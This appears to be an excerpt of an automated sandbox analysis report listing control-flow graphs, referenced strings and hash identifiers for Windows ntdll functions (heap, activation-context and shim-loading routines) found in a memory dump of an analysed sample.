                                                          control_flow_graph 700 360ea1f0-360ea269 call 36022330 * 2 RtlDebugPrintTimes 706 360ea41f-360ea444 call 360224d0 * 2 call 36054b50 700->706 707 360ea26f-360ea27a 700->707 709 360ea27c-360ea289 707->709 710 360ea2a4 707->710 712 360ea28f-360ea295 709->712 713 360ea28b-360ea28d 709->713 714 360ea2a8-360ea2b4 710->714 716 360ea29b-360ea2a2 712->716 717 360ea373-360ea375 712->717 713->712 718 360ea2c1-360ea2c3 714->718 716->714 719 360ea39f-360ea3a1 717->719 720 360ea2b6-360ea2bc 718->720 721 360ea2c5-360ea2c7 718->721 723 360ea3a7-360ea3b4 719->723 724 360ea2d5-360ea2fd RtlDebugPrintTimes 719->724 726 360ea2be 720->726 727 360ea2cc-360ea2d0 720->727 721->719 729 360ea3da-360ea3e6 723->729 730 360ea3b6-360ea3c3 723->730 724->706 738 360ea303-360ea320 RtlDebugPrintTimes 724->738 726->718 728 360ea3ec-360ea3ee 727->728 728->719 735 360ea3fb-360ea3fd 729->735 733 360ea3cb-360ea3d1 730->733 734 360ea3c5-360ea3c9 730->734 739 360ea4eb-360ea4ed 733->739 740 360ea3d7 733->740 734->733 736 360ea3ff-360ea401 735->736 737 360ea3f0-360ea3f6 735->737 743 360ea403-360ea409 736->743 741 360ea3f8 737->741 742 360ea447-360ea44b 737->742 738->706 748 360ea326-360ea34c RtlDebugPrintTimes 738->748 739->743 740->729 741->735 747 360ea51f-360ea521 742->747 744 360ea40b-360ea41d RtlDebugPrintTimes 743->744 745 360ea450-360ea474 RtlDebugPrintTimes 743->745 744->706 745->706 751 360ea476-360ea493 RtlDebugPrintTimes 745->751 748->706 753 360ea352-360ea354 748->753 751->706 758 360ea495-360ea4c4 RtlDebugPrintTimes 751->758 755 360ea356-360ea363 753->755 756 360ea377-360ea38a 753->756 759 360ea36b-360ea371 755->759 760 360ea365-360ea369 755->760 757 360ea397-360ea399 756->757 761 360ea38c-360ea392 757->761 762 360ea39b-360ea39d 757->762 758->706 766 360ea4ca-360ea4cc 758->766 759->717 759->756 760->759 763 360ea3e8-360ea3ea 761->763 764 360ea394 761->764 762->719 763->728 764->757 767 360ea4ce-360ea4db 766->767 768 360ea4f2-360ea505 766->768 769 360ea4dd-360ea4e1 767->769 770 360ea4e3-360ea4e9 767->770 771 360ea512-360ea514 768->771 769->770 770->739 770->768 772 360ea516 771->772 773 360ea507-360ea50d 771->773 772->736 774 360ea50f 773->774 775 360ea51b-360ea51d 773->775 774->771 775->747
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP:
                                                          • API String ID: 3446177414-2466845122
                                                          • Opcode ID: bfc0ce468eb185dc27310d553532d7754bfb3171f139c76fee3eaf4fd7bbed58
                                                          • Instruction ID: 4242dee9a1d7b30f04772ad12cfc1101ce3db849c5105bb092729944c57873f1
                                                          • Opcode Fuzzy Hash: bfc0ce468eb185dc27310d553532d7754bfb3171f139c76fee3eaf4fd7bbed58
                                                          • Instruction Fuzzy Hash: 55A1BEB5A14B218FD704CE29C891A1ABBE5FF8C354F1445AEE945EB310EBB0EC45CB91
                                                          Function 36047550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 776 36047550-36047571 777 36047573-3604758f call 3601e580 776->777 778 360475ab-360475b9 call 36054b50 776->778 783 36047595-360475a2 777->783 784 36084443 777->784 785 360475a4 783->785 786 360475ba-360475c9 call 36047738 783->786 788 3608444a-36084450 784->788 785->778 792 36047621-3604762a 786->792 793 360475cb-360475e1 call 360476ed 786->793 790 360475e7-360475f0 call 36047648 788->790 791 36084456-360844c3 call 3609ef10 call 36058f40 RtlDebugPrintTimes BaseQueryModuleData 788->791 790->792 801 360475f2 790->801 791->790 811 360844c9-360844d1 791->811 796 360475f8-36047601 792->796 793->788 793->790 803 36047603-36047612 call 3604763b 796->803 804 3604762c-3604762e 796->804 801->796 805 36047614-36047616 803->805 804->805 809 36047630-36047639 805->809 810 36047618-3604761a 805->810 809->810 810->785 813 3604761c 810->813 811->790 812 360844d7-360844de 811->812 812->790 814 360844e4-360844ef 812->814 815 360845c9-360845db call 36052b70 813->815 816 360845c4 call 36054c68 814->816 817 360844f5-3608452e call 3609ef10 call 3605a9c0 814->817 815->785 816->815 825 36084530-36084541 call 3609ef10 817->825 826 36084546-36084576 call 3609ef10 817->826 825->792 826->790 831 3608457c-3608458a call 3605a690 826->831 834 3608458c-3608458e 831->834 835 36084591-360845ae call 3609ef10 call 3608cc1e 831->835 834->835 835->790 840 360845b4-360845bd 835->840 840->831 841 360845bf 840->841 841->790
                                                          Strings
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36084530
                                                          • Execute=1, xrefs: 3608451E
                                                          • ExecuteOptions, xrefs: 360844AB
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36084507
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 36084592
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3608454D
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36084460
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: acf26450c10d35698d044a95538322efa4bba660a99c99841b4ea722f1c29baa
                                                          • Instruction ID: ea2f19f2ab2415677bd8c05ef6b4fb143fe46a4dda98177daad21b225ae53960
                                                          • Opcode Fuzzy Hash: acf26450c10d35698d044a95538322efa4bba660a99c99841b4ea722f1c29baa
                                                          • Instruction Fuzzy Hash: 44514971A00318AAEF21EB95DD9AFAD7BA9EF08304F4004F9D504AB191DB709E45CF61
                                                          Function 3602A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1222 3602a170-3602a18f 1223 3602a195-3602a1b1 1222->1223 1224 3602a4ad-3602a4b4 1222->1224 1225 360777f3-360777f8 1223->1225 1226 3602a1b7-3602a1c0 1223->1226 1224->1223 1227 3602a4ba-360777c8 1224->1227 1226->1225 1228 3602a1c6-3602a1cc 1226->1228 1227->1223 1232 360777ce-360777d3 1227->1232 1230 3602a1d2-3602a1d4 1228->1230 1231 3602a5da-3602a5dc 1228->1231 1230->1225 1233 3602a1da-3602a1dd 1230->1233 1231->1233 1234 3602a5e2 1231->1234 1235 3602a393-3602a399 1232->1235 1233->1225 1236 3602a1e3-3602a1e6 1233->1236 1234->1236 1237 3602a1fa-3602a1fd 1236->1237 1238 3602a1e8-3602a1f1 1236->1238 1241 3602a203-3602a24b 1237->1241 1242 3602a5e7-3602a5f0 1237->1242 1239 3602a1f7 1238->1239 1240 360777d8-360777e2 1238->1240 1239->1237 1244 360777e7-360777f0 call 3609ef10 1240->1244 1245 3602a250-3602a255 1241->1245 1242->1241 1243 3602a5f6-3607780c 1242->1243 1243->1244 1244->1225 1248 3602a25b-3602a263 1245->1248 1249 3602a39c-3602a39f 1245->1249 1251 3602a26f-3602a27d 1248->1251 1253 3602a265-3602a269 1248->1253 1250 3602a3a5-3602a3a8 1249->1250 1249->1251 1254 36077823-36077826 1250->1254 1255 3602a3ae-3602a3be 1250->1255 1251->1255 1257 3602a283-3602a288 1251->1257 1253->1251 1256 3602a4bf-3602a4c8 1253->1256 1258 3607782c-36077831 1254->1258 1259 3602a28c-3602a28e 1254->1259 1255->1254 1260 3602a3c4-3602a3cd 1255->1260 1261 3602a4e0-3602a4e3 1256->1261 1262 3602a4ca-3602a4cc 1256->1262 1257->1259 1265 36077838 1258->1265 1263 36077833 1259->1263 1264 3602a294-3602a2ac call 3602a600 1259->1264 1260->1259 1267 3607780e 1261->1267 1268 3602a4e9-3602a4ec 1261->1268 1262->1251 1266 3602a4d2-3602a4db 1262->1266 1263->1265 1275 3602a3d2-3602a3d9 1264->1275 1276 3602a2b2-3602a2da 1264->1276 1272 3607783a-3607783c 1265->1272 1266->1259 1270 36077819 1267->1270 1269 3602a4f2-3602a4f5 1268->1269 1268->1270 1269->1262 1270->1254 1272->1235 1274 36077842 1272->1274 1277 3602a2dc-3602a2de 1275->1277 1278 3602a3df-3602a3e2 1275->1278 1276->1277 1277->1272 1279 3602a2e4-3602a2eb 1277->1279 1278->1277 1280 3602a3e8-3602a3f3 1278->1280 1281 3602a2f1-3602a2f4 1279->1281 1282 360778ed 1279->1282 1280->1245 1283 3602a300-3602a30a 1281->1283 1284 360778f1-36077909 call 3609ef10 1282->1284 1283->1284 1285 3602a310-3602a32c call 3602a760 1283->1285 1284->1235 1290 3602a332-3602a337 1285->1290 1291 3602a4f7-3602a500 1285->1291 1290->1235 1294 3602a339-3602a35d 1290->1294 1292 3602a502-3602a50b 1291->1292 1293 3602a521-3602a523 1291->1293 1292->1293 1295 3602a50d-3602a511 1292->1295 1296 3602a525-3602a543 call 36014428 1293->1296 1297 3602a549-3602a551 1293->1297 1298 3602a360-3602a363 1294->1298 1299 3602a5a1-3602a5cb RtlDebugPrintTimes 1295->1299 1300 3602a517-3602a51b 1295->1300 1296->1235 1296->1297 1302 3602a3f8-3602a3fc 1298->1302 1303 3602a369-3602a36c 1298->1303 1299->1293 1318 3602a5d1-3602a5d5 1299->1318 1300->1293 1300->1299 1305 36077847-3607784f 1302->1305 1306 3602a402-3602a405 1302->1306 1307 3602a372-3602a374 1303->1307 1308 360778e3 1303->1308 1312 36077855-36077859 1305->1312 1313 3602a554-3602a56a 1305->1313 1306->1313 1314 3602a40b-3602a40e 1306->1314 1309 3602a440-3602a459 call 3602a600 1307->1309 1310 3602a37a-3602a381 1307->1310 1308->1282 1328 3602a57e-3602a585 1309->1328 1329 3602a45f-3602a487 1309->1329 1316 3602a387-3602a38c 1310->1316 1317 3602a49b-3602a4a2 1310->1317 1312->1313 1319 3607785f-36077868 1312->1319 1320 3602a570-3602a579 1313->1320 1321 3602a414-3602a42c 1313->1321 1314->1303 1314->1321 1316->1235 1323 3602a38e 1316->1323 1317->1283 1324 3602a4a8 1317->1324 1318->1293 1325 36077892-36077894 1319->1325 1326 3607786a-3607786d 1319->1326 1320->1307 1321->1303 1327 3602a432-3602a43b 1321->1327 1323->1235 1324->1282 1325->1313 1330 3607789a-360778a3 1325->1330 1331 3607786f-36077879 1326->1331 1332 3607787b-3607787e 1326->1332 1327->1307 1333 3602a489-3602a48b 1328->1333 1334 3602a58b-3602a58e 1328->1334 1329->1333 1330->1307 1335 3607788e 1331->1335 1336 36077880-36077889 1332->1336 1337 3607788b 1332->1337 1333->1316 1338 3602a491-3602a493 1333->1338 1334->1333 1339 3602a594-3602a59c 1334->1339 1335->1325 1336->1330 1337->1335 1340 3602a499 1338->1340 1341 360778a8-360778b1 1338->1341 1339->1298 1340->1317 1341->1340 1342 360778b7-360778bd 1341->1342 1342->1340 1343 360778c3-360778cb 1342->1343 1343->1340 1344 360778d1-360778dc 1343->1344 1344->1343 1345 360778de 1344->1345 1345->1340
                                                          Strings
                                                          • SsHd, xrefs: 3602A304
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 360777DD, 36077802
                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 360778F3
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 360777E2
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36077807
                                                          • Actx , xrefs: 36077819, 36077880
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                          • API String ID: 0-1988757188
                                                          • Opcode ID: 75f6e0b54162e88b53b5d827c710c9d9810774eaa30cde4d2b73e9bc9135c6b9
                                                          • Instruction ID: fb6d2154a678682835c3632089cb2eb156ff88969df6b0aaed8ffe3630218da0
                                                          • Opcode Fuzzy Hash: 75f6e0b54162e88b53b5d827c710c9d9810774eaa30cde4d2b73e9bc9135c6b9
                                                          • Instruction Fuzzy Hash: 82E1B274A043128FE704CE25C89671B7BE1BF843A4F500AADF855EB290DFB1D889CB91
                                                          Function 3602D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1390 3602d690-3602d6cb 1391 3602d6d1-3602d6db 1390->1391 1392 3602d907-3602d90e 1390->1392 1393 36079164 1391->1393 1394 3602d6e1-3602d6ea 1391->1394 1392->1391 1395 3602d914-36079139 1392->1395 1401 3607916e-3607917d 1393->1401 1394->1393 1397 3602d6f0-3602d6f3 1394->1397 1395->1391 1400 3607913f-36079144 1395->1400 1398 3602d8fa-3602d8fc 1397->1398 1399 3602d6f9-3602d6fb 1397->1399 1402 3602d701-3602d704 1398->1402 1404 3602d902 1398->1404 1399->1393 1399->1402 1403 3602d847-3602d858 call 36054b50 1400->1403 1405 36079158-36079161 call 3609ef10 1401->1405 1402->1393 1406 3602d70a-3602d70d 1402->1406 1404->1406 1405->1393 1409 3602d713-3602d716 1406->1409 1410 3602d919-3602d922 1406->1410 1414 3602d71c-3602d768 call 3602d580 1409->1414 1415 3602d92d-3602d936 1409->1415 1410->1409 1413 3602d928-36079153 1410->1413 1413->1405 1414->1403 1420 3602d76e-3602d772 1414->1420 1415->1414 1417 3602d93c 1415->1417 1417->1401 1420->1403 1421 3602d778-3602d77f 1420->1421 1422 3602d8f1-3602d8f5 1421->1422 1423 3602d785-3602d789 1421->1423 1424 36079370-36079388 call 3609ef10 1422->1424 1425 3602d790-3602d79a 1423->1425 1424->1403 1425->1424 1426 3602d7a0-3602d7a7 1425->1426 1428 3602d7a9-3602d7ad 1426->1428 1429 3602d80d-3602d82d 1426->1429 1431 3602d7b3-3602d7b8 1428->1431 1432 3607917f 1428->1432 1433 3602d830-3602d833 1429->1433 1434 36079186-36079188 1431->1434 1435 3602d7be-3602d7c5 1431->1435 1432->1434 1436 3602d835-3602d838 1433->1436 1437 3602d85b-3602d860 1433->1437 1434->1435 1440 3607918e-360791b7 1434->1440 1441 360791f7-360791fa 1435->1441 1442 3602d7cb-3602d803 call 36058170 1435->1442 1443 36079366-3607936b 1436->1443 1444 3602d83e-3602d840 1436->1444 1438 3602d866-3602d869 1437->1438 1439 360792e0-360792e8 1437->1439 1445 3602d941-3602d94f 1438->1445 1446 3602d86f-3602d872 1438->1446 1439->1445 1447 360792ee-360792f2 1439->1447 1440->1429 1448 360791bd-360791d7 call 36068050 1440->1448 1450 360791fe-3607920d call 36068050 1441->1450 1464 3602d805-3602d807 1442->1464 1443->1403 1451 3602d842 1444->1451 1452 3602d891-3602d8ac call 3602a600 1444->1452 1453 3602d874-3602d884 1445->1453 1456 3602d955-3602d95e 1445->1456 1446->1436 1446->1453 1447->1445 1454 360792f8-36079301 1447->1454 1448->1464 1469 360791dd-360791f0 1448->1469 1474 36079224 1450->1474 1475 3607920f-3607921d 1450->1475 1451->1403 1471 3602d8b2-3602d8da 1452->1471 1472 36079335-3607933a 1452->1472 1453->1436 1460 3602d886-3602d88f 1453->1460 1461 36079303-36079306 1454->1461 1462 3607931f-36079321 1454->1462 1456->1444 1460->1444 1467 36079310-36079313 1461->1467 1468 36079308-3607930e 1461->1468 1462->1445 1473 36079327-36079330 1462->1473 1464->1429 1470 3607922d-36079231 1464->1470 1477 36079315-3607931a 1467->1477 1478 3607931c 1467->1478 1468->1462 1469->1448 1479 360791f2 1469->1479 1470->1429 1476 36079237-3607923d 1470->1476 1480 3602d8dc-3602d8de 1471->1480 1472->1480 1481 36079340-36079343 1472->1481 1473->1444 1474->1470 1475->1450 1482 3607921f 1475->1482 1483 36079264-3607926d 1476->1483 1484 3607923f-3607925c 1476->1484 1477->1473 1478->1462 1479->1429 1485 36079356-3607935b 1480->1485 1486 3602d8e4-3602d8eb 1480->1486 1481->1480 1487 36079349-36079351 1481->1487 1482->1429 1489 360792b4-360792b6 1483->1489 1490 3607926f-36079274 1483->1490 1484->1483 1488 3607925e-36079261 1484->1488 1485->1403 1491 36079361 1485->1491 1486->1422 1486->1425 1487->1433 1488->1483 1493 360792d9-360792db 1489->1493 1494 360792b8-360792d3 call 36014428 1489->1494 1490->1489 1492 36079276-3607927a 1490->1492 1491->1443 1495 36079282-360792ae RtlDebugPrintTimes 1492->1495 1496 3607927c-36079280 1492->1496 1493->1403 1494->1403 1494->1493 1495->1489 1500 360792b0 1495->1500 1496->1489 1496->1495 1500->1489
                                                          APIs
                                                          Strings
                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3607914E, 36079173
                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36079153
                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 36079178
                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 36079372
                                                          • Actx , xrefs: 36079315
                                                          • GsHd, xrefs: 3602D794
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                          • API String ID: 3446177414-2196497285
                                                          • Opcode ID: 8d01ed1bf1e5c5c1a38f30e267c16d929dd6df20e659c52f8f018499686c4652
                                                          • Instruction ID: 9a1c9c2356e7efdf1a774a089950c43adf29a8af402147bbcb169558fd19cb0b
                                                          • Opcode Fuzzy Hash: 8d01ed1bf1e5c5c1a38f30e267c16d929dd6df20e659c52f8f018499686c4652
                                                          • Instruction Fuzzy Hash: 7AE1A374A043428FE700CF15C882B5ABFF5BF88358F504AADE9A58B291D771DC85CB92
                                                          Function 3608FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                          • API String ID: 3446177414-4227709934
                                                          • Opcode ID: 891e5265cf097835ef937e87d37672c4f691b754c4bb6df1965f27c4d457ae2b
                                                          • Instruction ID: b2baf5d9a2848d81a340ac2fd0042b2ec00f7452c1f86f87471e6f97124b6479
                                                          • Opcode Fuzzy Hash: 891e5265cf097835ef937e87d37672c4f691b754c4bb6df1965f27c4d457ae2b
                                                          • Instruction Fuzzy Hash: B0415BB9E00209ABDB01DFA9C992ADEBFF5FF48394F1000A9E904B7350D7719A51CB90
                                                          Function 36006565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36069885
                                                          • LdrpLoadShimEngine, xrefs: 3606984A, 3606988B
                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36069843
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 36069854, 36069895
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 3446177414-3589223738
                                                          • Opcode ID: ce103c76942d319ad50d0ef16b129685892ffb6a71765869b2c7fe0b78b94efd
                                                          • Instruction ID: 2a89bbe70091c936f03d0314ee2bc6d2f2e486e795fc67a121fc6c342887ec82
                                                          • Opcode Fuzzy Hash: ce103c76942d319ad50d0ef16b129685892ffb6a71765869b2c7fe0b78b94efd
                                                          • Instruction Fuzzy Hash: D5513475A203549FEF04DBA9CC56A9D7FF3BB40304F0401AAE640BB2A6CB709C65CB91
                                                          Function 3603DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                          • API String ID: 3446177414-3224558752
                                                          • Opcode ID: 3a630b3f3c9bf2a664021e7d737d32d33f7eb8bd31fecf21041e77391cf8441f
                                                          • Instruction ID: 8e82600c47973c03a46a52181407b1247fb26a48afe8add76fccdb3cad04fcfd
                                                          • Opcode Fuzzy Hash: 3a630b3f3c9bf2a664021e7d737d32d33f7eb8bd31fecf21041e77391cf8441f
                                                          • Instruction Fuzzy Hash: 73416834A01B45DFE701CF28CA46B4DBFF4EF40325F2089E8E52587281CB38A984DB96
                                                          Function 360BECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • ---------------------------------------, xrefs: 360BEDF9
                                                          • HEAP: , xrefs: 360BECDD
                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 360BEDE3
                                                          • Entry Heap Size , xrefs: 360BEDED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                          • API String ID: 3446177414-1102453626
                                                          • Opcode ID: 19da0dc182e9ee151420815afbc100659120b730aa4309500981dcc7dd2b9dd5
                                                          • Instruction ID: 19c43a1c737e3f0f8864f7760b395243232150c6f6ecbb9a7b9aec7196ccc85b
                                                          • Opcode Fuzzy Hash: 19da0dc182e9ee151420815afbc100659120b730aa4309500981dcc7dd2b9dd5
                                                          • Instruction Fuzzy Hash: BC418A39A10211DFDF18DF19C88190ABFF6EF89394B25C4AAD508AB220D771EC56DF90
                                                          Function 3603DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                          • API String ID: 3446177414-1222099010
                                                          • Opcode ID: c4c97380d33d818b5e43cc23ab34d8cf1f4479c041339391c02fee79f707f1b5
                                                          • Instruction ID: 1a9cd9cf72bb1cb52580933f5ee807b66e095fa2403de6a2dbd7b0065f431623
                                                          • Opcode Fuzzy Hash: c4c97380d33d818b5e43cc23ab34d8cf1f4479c041339391c02fee79f707f1b5
                                                          • Instruction Fuzzy Hash: F9313135512784EFF712CB28C90AB4E7FE8EF01768F1088C4E5214B691CB69AA84CB52
                                                          Function 36019046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$@
                                                          • API String ID: 3446177414-1194432280
                                                          • Opcode ID: b7df868388d7995236fc32e99d1473004f2126f66ca6520dccd9df0d9c8650f6
                                                          • Instruction ID: b1c966ff5bd0242b4e5c2b4007f05bd30e8cfcded4673433dd04cc5d93e6d243
                                                          • Opcode Fuzzy Hash: b7df868388d7995236fc32e99d1473004f2126f66ca6520dccd9df0d9c8650f6
                                                          • Instruction Fuzzy Hash: 78813AB5D002699FDB21CB55CD42BDEBBB8AF08750F0041EAEA19B7240D7709E85CFA5
                                                          Function 36044C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
